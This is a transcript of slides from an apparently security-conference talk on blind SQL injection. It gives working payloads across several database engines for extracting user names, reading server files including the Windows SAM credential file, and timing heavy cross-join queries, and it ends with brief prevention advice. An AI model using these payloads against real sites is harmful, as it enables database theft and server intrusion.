Presentation is loading. Please wait.

Presentation is loading. Please wait.

(Re) Playing with (Blind) SQL Injection

Published byLaurence Berry Modified over 9 years ago

Similar presentations

Presentation on theme: "(Re) Playing with (Blind) SQL Injection"— Presentation transcript:

1 (Re) Playing with (Blind) SQL Injection
José Palazón “Palako” Mobile Security at Yahoo! Chema Alonso Informatica64 Microsoft MVP Enterprise Security

2 Spain (…not only bulls…)

3 SQL Injection attacks A long time ago, in a galaxy far, far away…

4 Agenda Serialized SQL Injection Arithmetic SQL Injection
Demo: XML Extractor Arithmetic SQL Injection Divide by Zero Sums and subtractions Type oveflow Demo Remote File Downloading using Blind SQL Injection SQL Sever MySQL Oracle Demo: RFD Tool Time-Based Blind SQL Injection using heavy queries Demo: Marathon Tool

5 Serialized SQL Injection

6 Serialized SQL Injection
Goal: To Merge complex resultsets in a single showable field XML serialization functions allow to convert a resultset into a one XML string. It´s possible to download big amount of data with single and simple injections.

7 SQL Server FOR XML: Retrieves data as a single string representing an XML tree. RAW: Mandatory option. Shows the information converting each row of the result set in an XML element in the form <row />. BINARY BASE64: The query will fail if we find any BINARY data type column (containing images, or passwords) if this option is not explicitly specified. union select '1','2','3',(select * from sysusers for xml raw, binary base64) XMLSCHEMA: obtains the whole table structure, including the data types, column names and other constraints. Described by Dani Kachakil

8 MySQL No default XML support, requires a server side extension
GROUP_CONCAT (v 4.1+)

9 Oracle xmlforest, xmlelement,… No * support

10 Demo: Serialized SQL Injection

11 Arithmetic Blind SQL Injection

12 Blind Attacks Attacker injects code but can´t access directly to the data. However this injection changes the behavior of the web application. Then the attacker looks for differences between true code injections (1=1) and false code injections (1=2) in the response pages to extract data. Blind SQL Injection Biind Xpath Injection Blind LDAP Injection

13 Blind SQL Injection Attacks
Attacker injects: “True where clauses” “False where clauses“ Ex: Program.php?id=1 and 1=1 Program.php?id=1 and 1=2 Program doesn’t return any visible data from database or data in error messages. The attacker can´t see any data extracted from the database.

14 Blind SQL Injection Attacks
Attacker analyzes the response pages looking for differences between “True-Answer Page” and “False-Answer Page”: Different hashes Different html structure Different patterns (keywords) Different linear ASCII sums “Different behavior” By example: Response Time

15 Blind SQL Injection Attacks
If any difference exists, then: Attacker can extract all information from database How? Using “booleanization” MySQL: Program.php?id=1 and 100>(ASCII(Substring(user(),1,1))) “True-Answer Page” or “False-Answer Page”? MSSQL: Program.php?id=1 and 100>(Select top 1 ASCII(Substring(name,1,1))) from sysusers) Oracle: Program.php?id=1 and 100>(Select ASCII(Substr(username,1,1))) from all_users where rownum<=1)

16 Arithmetic Blind SQL Injection
The query force the parameter to be numeric SELECT field FROM table WHERE id=abs(param) Boolean logic is created with math operations Divide by zero Sums and subtractions Type overflows

17 Arithmetic Blind SQL Injection
Divide by zero (David Litchfield) Id=A+(1/(ASCII(B)-C)) A-> Param value originally used in the query. B -> Value we are searching for, e.g.: Substring(passwd,1,1) C-> Counter [0..255] When ASCII(B)=C, the DB will generate a divide by zero exception.

18 Arithmetic Blind SQL Injection
Sums and subtractions Id=A+ASCII(B)-C A-> Param value originally used in the query. B -> Value we are searching for, e.g.: Substring(passwd,1,1) C-> Counter [0..255] When ASCII(B)=C, then the response page of id=A+ASCII(B)-C will be the same as id=A

19 Arithmetic Blind SQL Injection
Value type overflow Id=A+((C/ASCII(B))*(K)) A-> Param value originally used in the query. B -> Value we are searching for, e.g.: Substring(passwd,1,1) C-> Counter [0..255] K-> Value that overflows the type defined for A (e.g. if A is integer, then K=2^32) When C/ASCII(B)==1, K*1 overflows the data type

20 Demo: Divide by zero Sums and subtractions Integer overflow

21 Remote File Downloading using Blind SQL Injection techniques

22 Accessing Files Two ways: Load the file in a temp table
and i>(select top 1 ASCII(Substring(column)(file,pos,1)) from temp_table ?? Load the file in the query With every query the file is loaded in memory I am very sorry, engine  and i>ASCII(Substring(load_file(file,pos,1))??

23 SQL Server 2K - External Data Sources
Only for known filetypes: Access trough Drivers: Txt, csv, xls, mdb, log And 200>ASCII (SUBSTRING(SELECT * FROM OPENROWSET('MSDASQL', 'Driver = {Microsoft Text Driver (*.txt; *.csv)};DefaultDir=C:\;','select top 1 * from c:\dir\target.txt’),1,1)) Privileges HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSSQLServer\Providers\DisallowAdhocAccess=0 By default this key doesn´t exist so only users with Server Admin Role can use these functions. NTFS permissions

24 SQL Server 2K – Bulk option
Access to any file ; Create Table TempTable as (row varchar(8000)) -- ; Bulk Insert TempTable From 'c:\file.ext' With (FIELDTERMINATOR = '\n', ROWTERMINATOR = '\n‘) -- ; alter table TempTable add num int IDENTITY(1,1) NOT NULL – and (select COUNT(row) from TempTable) and (select top 1 len(row) from TempTable where num = rownum) and (select top 1 ASCII(SUBSTRING(row,1,1)) from TempTable where num = 1) ; Drop Table TempTable-- Privileges needed Server Role: Bulkadmin Database Role: db_owner o db_ddladmin NTFS permissions

25 SQL Server 2k5 – 2k8 OPENDATASOURCE and OPENROWSET supported
Bulk options improved AND 256 > ASCII(SUBSTRING ((SELECT * FROM OPENROWSET(BULK 'c:\windows\repair\sam', SINGLE_BLOB) As Data), 1, 1))— Permisions Bulkadmin Server Role External Data Sources enabled Sp_configure Surface configuration Tool for features

26 MySQL LoadFile Load Data infile
SELECT LOAD_FILE(0x633A5C626F6F742E696E69) SQLbfTools: MySQLget command (illo and dab) Load Data infile ; Create table C8DFC643 (datos varchar(4000)) ; Load data infile 'c:\\boot.ini' into table C8DFC643 ; alter table C8DFC643 add column num integer auto_increment unique key and (select count(num) from C8DFC643) and (select length(datos) from C8DFC643 where num = 1) and (select ASCII(substring(datos,5,1)) from C8DFC643 where num = 1) ; Drop table C8DFC643

27 Oracle – Plain Text files
External Tables ; execute immediate 'Create Directory A4A9308C As ''c:\'' '; end; -- ; execute immediate 'Create table A737D141 ( datos varchar2(4000) ) organization external (TYPE ORACLE_LOADER default directory A4A9308C access parameters ( records delimited by newline ) location (''boot.ini''))'; end;-- Only Plain Text files

28 Oracle – DBMS_LOB ; execute immediate ‘ DECLARE l_bfile BFILE;
l_blob BLOB; BEGIN INSERT INTO A737D141 (datos) VALUES (EMPTY_BLOB()) RETURN datos INTO l_blob; l_bfile := BFILENAME(''A4A9308C'', ''Picture.bmp''); DBMS_LOB.fileopen(l_bfile, Dbms_Lob.File_Readonly); DBMS_LOB.loadfromfile(l_blob,l_bfile,DBMS_LOB.getlength(l_bfile)); DBMS_LOB.fileclose(l_bfile); COMMIT; EXCEPTION WHEN OTHERS THEN ROLLBACK; END;‘ ; end; --

29 Demo RFD

30 Time-based Blind SQL Injection using heavy queries

31 Time-Based Blind SQL Injection
In scenarios with no differences between “True-Answer Page” and “False-Answer Page”, time delays can be used. Injection forces a delay in the response page when the condition injected is True. - Delay functions: SQL Server: waitfor Oracle: dbms_lock.sleep MySQL: sleep or Benchmark Function Postgres: pg_sleep Ex: ; if (exists(select * from users)) waitfor delay '0:0:5’

32 Exploit for Solar Empire Web Game

33 Deep Blind SQL Injection
Time delay depends on the wanted value. E.g. “a”->10s. delay, “b”->11s. Delay, …

34 Time-Based Blind SQL Injection
What about databases engines without delay functions, i.e., MS Access, Oracle connection without PL/SQL support, DB2, etc…? Can we still perform an exploitation of Time-Based Blind SQL Injection Attacks?

35 Yes, we can!

36 “Where-Clause” execution order
Select “whatever “ From whatever Where condition1 and condition2 - Condition1 lasts 10 seconds - Condition2 lasts 100 seconds Which condition should be executed first?

37 The heavy condition first
Condition2 (100 sec) Condition1 (10 sec) Condition2 & condition1 Response Time TRUE FALSE 110 sec Not evaluated 100 sec

38 The light condition first
Condition1 (10 sec) Condition2 (100 sec) Condition1 & condition2 Response Time TRUE FALSE 110 sec Not evaluated 10 sec

39 Time-Based Blind SQL Injection using Heavy Queries
Attacker can perform an exploitation delaying the “True-answer page” using a heavy query. It depends on how the database engine evaluates the where clauses in the query. There are two types of database engines: Databases without optimization process Databases with optimization process

40 Time-Based Blind SQL Injection using Heavy Queries
Attacker could inject a heavy Cross-Join condition for delaying the response page in True-Injections. The Cross-join injection must be heavier than the other condition. Attacker only have to know or to guess the name of a table with select permission in the database. Example in MSSQL: Program.php?id=1 and (SELECT count(*) FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7, sysusers AS sys8)>1 and 300>(select top 1 ascii(substring(name,1,1)) from sysusers)

41 “Default” tables to construct a heavy query
Microsoft SQL Server sysusers Oracle all_users MySQL (versión 5) information_schema.columns Microsoft Access MSysAccessObjects (97 & 2000 versions) MSysAccessStorage (2003 & 2007)

42 “Default” tables to construct a heavy query
…or whatever you can guess Clients Customers News Logins Users Providers ….Use your imagination…

43 Query lasts 14 seconds -> True-Answer
Ex 1: MS SQL Server Query lasts 14 seconds -> True-Answer

44 Ex 1: MS SQL Server Query lasts 1 second -> False-Answer

45 Query Lasts 22 seconds –> True-Answer
Ex 2: Oracle Query Lasts 22 seconds –> True-Answer

46 Query Lasts 1 second –> False-Answer
Ex 2: Oracle Query Lasts 1 second –> False-Answer

47 Query Lasts 6 seconds –> True-Answer
Ex 3: Access 2000 Query Lasts 6 seconds –> True-Answer

48 Query Lasts 1 second –> False-Answer
Ex 3: Access 2000 Query Lasts 1 second –> False-Answer

49 Query Lasts 39 seconds –> True-Answer
Ex 4: Access 2007 Query Lasts 39 seconds –> True-Answer

50 Query Lasts 1 second –> False-Answer
Ex 4: Access 2007 Query Lasts 1 second –> False-Answer

51 Marathon Tool Automates Time-Based Blind SQL Injection Attacks using Heavy Queries in SQL Server, MySQL, MS Access and Oracle Databases. Schema Extraction from known databases Extract data using heavy queries not matter in which database engine (without schema) Developed in .NET Source code available

52 Demo: Marathon Tool

53 Prevention: Don´t forget Bobby Tables! SANITIZE YOUR QUERIES!

54 ¿Preguntas? Speakers: Autores Chema Alonso (chema@informatica64.com)
Palako Autores Alejandro Martín Antonio Guzmán Daniel Kachakil José Palazón “Palako” Marta Beltran

Download ppt "(Re) Playing with (Blind) SQL Injection"

Similar presentations

Module XIV SQL Injection

Module XIV SQL Injection
© 2008 Security-Assessment.com 1 Time Based SQL Injection Presented by Muhaimin Dzulfakar.

© 2008 Security-Assessment.com 1 Time Based SQL Injection Presented by Muhaimin Dzulfakar.
Module 8 Importing and Exporting Data. Module Overview Transferring Data To/From SQL Server Importing & Exporting Table Data Inserting Data in Bulk.

Module 8 Importing and Exporting Data. Module Overview Transferring Data To/From SQL Server Importing & Exporting Table Data Inserting Data in Bulk.
How Did I Steal Your Database Mostafa

How Did I Steal Your Database Mostafa
Quick-and-dirty.  Commands end in a semi-colon ◦ If you forget, another prompt line shows up  Either continue the command or…  End it with a semi-colon.

Quick-and-dirty.  Commands end in a semi-colon ◦ If you forget, another prompt line shows up  Either continue the command or…  End it with a semi-colon.
Fundamentals, Design, and Implementation, 9/e Chapter 11 Managing Databases with SQL Server 2000.

Fundamentals, Design, and Implementation, 9/e Chapter 11 Managing Databases with SQL Server 2000.
Manipulating MySQL Databases with PHP. PHP and mySQL2 Objectives Connect to MySQL from PHP Learn how to handle MySQL errors Execute SQL statements with.

Manipulating MySQL Databases with PHP. PHP and mySQL2 Objectives Connect to MySQL from PHP Learn how to handle MySQL errors Execute SQL statements with.
ASP.NET Programming with C# and SQL Server First Edition Chapter 8 Manipulating SQL Server Databases with ASP.NET.

ASP.NET Programming with C# and SQL Server First Edition Chapter 8 Manipulating SQL Server Databases with ASP.NET.
Security in SQL Jon Holmes CIS 407 Fall 2007. Outline Surface Area Connection Strings Authenticating Permissions Data Storage Injections.

Security in SQL Jon Holmes CIS 407 Fall Outline Surface Area Connection Strings Authenticating Permissions Data Storage Injections.
Working with SQL and PL/SQL/ Session 1 / 1 of 27 SQL Server Architecture.

Working with SQL and PL/SQL/ Session 1 / 1 of 27 SQL Server Architecture.
DAT702.  Standard Query Language  Ability to access and manipulate databases ◦ Retrieve data ◦ Insert, delete, update records ◦ Create and set permissions.

DAT702.  Standard Query Language  Ability to access and manipulate databases ◦ Retrieve data ◦ Insert, delete, update records ◦ Create and set permissions.
SQL Basics+ Brandon Checketts. Why SQL? Structured Query Language Structured Query Language Frees programmers from dealing with specifics of data persistence.

SQL Basics+ Brandon Checketts. Why SQL? Structured Query Language Structured Query Language Frees programmers from dealing with specifics of data persistence.
Phil Brewster  One of the first steps – identify the proper data types  Decide how data (in columns) should be stored and used.

Phil Brewster  One of the first steps – identify the proper data types  Decide how data (in columns) should be stored and used.
Copyright © 2007 Ramez Elmasri and Shamkant B. Navathe Slide 26- 1.

Copyright © 2007 Ramez Elmasri and Shamkant B. Navathe Slide
Introduction To Databases IDIA 618 Fall 2014 Bridget M. Blodgett.

Introduction To Databases IDIA 618 Fall 2014 Bridget M. Blodgett.
DAT304 Leveraging XML and HTTP with Sql Server Irwin Dolobowsky Program Manager Webdata Group.

DAT304 Leveraging XML and HTTP with Sql Server Irwin Dolobowsky Program Manager Webdata Group.
DAY 21: MICROSOFT ACCESS – CHAPTER 5 MICROSOFT ACCESS – CHAPTER 6 MICROSOFT ACCESS – CHAPTER 7 Akhila Kondai October 30, 2013.

DAY 21: MICROSOFT ACCESS – CHAPTER 5 MICROSOFT ACCESS – CHAPTER 6 MICROSOFT ACCESS – CHAPTER 7 Akhila Kondai October 30, 2013.
Lecture 3 – Data Storage with XML+AJAX and MySQL+socket.io

Lecture 3 – Data Storage with XML+AJAX and MySQL+socket.io
PHP1-1 PHP & SQL Xingquan (Hill) Zhu

PHP1-1 PHP & SQL Xingquan (Hill) Zhu
CSCI 6962: Server-side Design and Programming

CSCI 6962: Server-side Design and Programming

Similar presentations

Ads by Google